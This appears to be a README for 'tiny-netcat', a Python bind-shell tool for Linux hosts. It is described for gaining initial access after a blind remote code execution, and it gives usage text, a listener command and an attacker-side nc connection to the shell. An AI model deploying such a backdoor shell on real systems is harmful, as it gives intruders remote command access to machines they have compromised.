tiny-netcat is a python script that provide shell access for remote connections through sockets.
Is util in systems were socat, netcat or nc binary is missing and you need an intermediate way to gain initial access.
- Python3 or Python2 installed in the host
- Use in Linux hosts
Ideal for initial access phase were a blind RCE is commonly obtained. Feel you free to prescind of the parameters if you cannot execute the script with arguments; in this cases, you can replace the argparse parameters with a static variable host/port to bind there.
The script is very simple: Use -h or run it without parameters to obtain a help message.
./tiny-netcat.py <-h|--help>
usage: tiny-netcat.py [-h] [-i HOST] [-p PORT]
Simple NetCat alternative
optional arguments:
-h, --help show this help message and exit
-i HOST, --host HOST Host were listen for incoming connections
-p PORT, --port PORT Port were listen for incoming connections
./netcat.py -h -p 5555
You can connect to the socket by using netcat or nc in the attacker computer:
netcat|nc 5555
Use -i to set the IPv4 address where you want bind the shell. Use -p to set the port where you wnat listen. Default port is 4444.
You can connect to the socket using netcat or nc.
This is a very limited shell, his purpose is not be a interactive shell, is provide a shell access when another tools went failed.